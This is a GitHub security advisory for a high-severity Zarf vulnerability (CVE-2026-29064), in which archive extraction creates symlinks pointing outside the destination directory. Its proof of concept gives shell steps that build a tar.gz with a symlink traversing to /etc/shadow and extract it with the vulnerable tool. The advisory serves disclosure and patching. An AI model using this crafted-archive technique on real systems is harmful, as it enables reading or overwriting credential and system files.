Skip to content

Zarf's symlink targets in archives are not validated against destination directory

High severity GitHub Reviewed Published Mar 6, 2026 in zarf-dev/zarf • Updated Mar 6, 2026

Package

gomod github.com/zarf-dev/zarf/src/pkg/archive (Go)

Affected versions

>= 0.54.0, < 0.73.1

Patched versions

0.73.1

Description

Summary

A path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.

What users should do

Upgrade immediately to version v0.73.1

If developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.

If using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.

Who is affected

  • Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the zarf tools archiver decompress functionality on generic archives.

  • Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations.

What is the risk

A malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.

Mitigating Factors

If developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low.

Details

The archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:

  1. defaultHandler (on line 320): Joins dst with f.LinkTarget, but does not verify the resolved path stays under dst. This means that a LinkTarget of "../../../../etc/shadow" would resolve outside the destination after filepath.Join.
  2. stripHandler (on line 342): Passes f.LinkTarget verbatim to os.Symlink.
  3. filterHandler (on line 370): Similar to defaultHandler, the code joins but does not validate the LinkTarget.

The vulnerability is a symlink variant of the "Zip Slip" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious f.LinkTarget. When the package is extracted, os.Symlink creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.

PoC

Proof of Concept You may want to follow through these steps inside of a disposable environment (container, VM): 
Reproduction via zarf tools archiver decompress (simplest)

This demonstrates the vulnerability using the defaultHandler (line 320).

# 1. Create a staging directory for the malicious archive contents.
mkdir -p /tmp/cve-repro/archive-contents

# 2. Create a symlink that traverses out of the extraction directory.
#    This symlink targets "../../../../../../../etc/shadow" relative to
#    whatever extraction destination is chosen.
cd /tmp/cve-repro/archive-contents
ln -s ../../../../../../../etc/shadow escape-link

# 3. Also create a regular file so the archive isn't empty besides the link.
echo "benign content" > readme.txt

# 4. Package into a tar.gz archive.
#    The --dereference flag is NOT used, so the symlink is stored as-is.
cd /tmp/cve-repro
tar -czf malicious.tar.gz -C archive-contents .

# 5. Verify the archive contains the symlink.
tar -tvf malicious.tar.gz
# Expected output includes:
#   lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow

# 6. Create the extraction destination (deeply nested so the traversal
#    resolves to a real path).
mkdir -p /tmp/cve-repro/extract/a/b/c/d

# 7. Run the vulnerable extraction.
zarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d

# 8. Verify the symlink was created pointing outside the destination.
ls -la /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: escape-link /etc/shadow
#
# The symlink target resolves to /etc/shadow, which is OUTSIDE
# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.

readlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: /etc/shadow

What happened: defaultHandler (line 320) executed:
os.Symlink(filepath.Join(dst, f.LinkTarget), target)
// = os.Symlink("/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow",
//              "/tmp/cve-repro/extract/a/b/c/d/escape-link")
filepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.
### References - https://github.com/zarf-dev/zarf/security/advisories/GHSA-hcm4-6hpj-vghm - https://nvd.nist.gov/vuln/detail/CVE-2026-29064 - https://github.com/zarf-dev/zarf/releases/tag/v0.73.1
@brandtkeller brandtkeller published to zarf-dev/zarf Mar 6, 2026
Published by the National Vulnerability Database Mar 6, 2026
Published to the GitHub Advisory Database Mar 6, 2026
Reviewed Mar 6, 2026
Last updated Mar 6, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(2nd percentile)

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

CVE ID

CVE-2026-29064

GHSA ID

GHSA-hcm4-6hpj-vghm

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.